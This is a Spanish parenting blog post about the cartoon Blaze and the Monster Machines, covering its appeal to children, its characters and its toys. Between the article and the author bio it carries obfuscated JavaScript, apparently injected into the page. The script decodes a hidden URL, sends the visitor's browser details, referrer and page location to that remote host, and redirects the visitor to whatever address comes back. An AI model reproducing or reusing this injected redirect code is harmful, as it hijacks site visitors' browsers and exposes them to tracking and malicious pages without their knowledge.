Blazer y los Monster Machines, el nuevo fenómeno infantil

¡Atención a padres y madres! Las aventuras de Ryder y todos sus cachorros han encontrado un duro competidor en la televisión (y poco a poco también en las jugueterías, en los kioscos, en las tienda de gominolas): las aventuras de Blazer y los Monster Machines y llegan tan veloces que ya superan a los de La Patrulla Canina, al menos en mi casa. Y esa velocidad con la que suben en popularidad es lo que les caracteriza y engancha, y es que cuando le pregunté a mi hija de cinco años por qué le gustaban estos dibujos, lo tuvo claro: “Corren más que los de La Patrulla Canina”, y añadió: “Siempre rescatan”. E intentado encontrar la fórmula del éxito de este título, pregunté a una amiga con un peque de 3 años (Raúl), que  “le gusta porque es muy interactivo y están todo el rato preguntando a los niños por números o rutas”.

Para los padres que aún no tengan en su radar estos dibujos (se emiten en Nickelodeon y Clan TV), os cuento la historia de estos personajes que antes o después entrarán con fuerza en vuestra casa, aunque como algunos apuntan, “aún no superan a La Patrulla Canina”, pero yo digo, tiempo al tiempo, porque Pablo, de 5 años, no para de tararear la canción a todas horas y su madre ya se la sabe de oírle a él.

Blaze es el héroe y el Monster Machine más rápido de la ciudad de Axle. Le encanta la ciencia y la tecnología y no duda en utilizar sus conocimientos para disfrutar en todas y cada una de sus aventuras. Además, Blaze es el único de la ciudad con un conductor humano, AJ, un niño de ocho años al que le encantan las emociones fuertes y aprender cosas nuevas. Gabby es otra de sus amigas, una joven mecánica de 9 años con un amplio conocimiento en Monster Machines, tanto, que gestiona el garaje de la ciudad de Axle. Y en esta historia hay coches de todo tipo y personalidades, y aquí es donde estos dibujos son capaces de enganchar a  peques de todo el mundo: está el luchador,  el competitivo, el entusiasta, el intrépido y el divertido, además de los antes ya citados.

Fisher Price ha lanzado ya su colección de juguetes, que está disponible en grandes superficies (hasta hace poco solo en Amazon se podía conseguir algo y no muy variado, la verdad), que fijo que se agotan rápidamente, y ni qué decir que de cara a la vuelta al cole todo se llenará de productos con la imagen de estos coches estampada en cualquier produto de papelería, o eso esperamos algunos padres y madres, porque Isabel (5 años) ya ha pedido la mochila de Blaze. Suerte, mami de Isabel, si la encuentras nos dices.

Me encanta que mi hija sea fan de este tipo de dibujos, bien sea La Patrulla Canina o Blazer y los Monster Machines, porque demuestra que no solo las niñas se fijan en princesas, que a ellas también le gustan los coches o los trenes o los superhéroes. Si es cierto que su personaje favorito es Starla, porque es morada y chica, pero el tema de los automóviles de siempre le ha gustado y no la he dicho nunca que no, es más, con dos años los Reyes Magos le trajeron un garaje, así que, ¡¡¡bienvenido Blaze!!!

var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *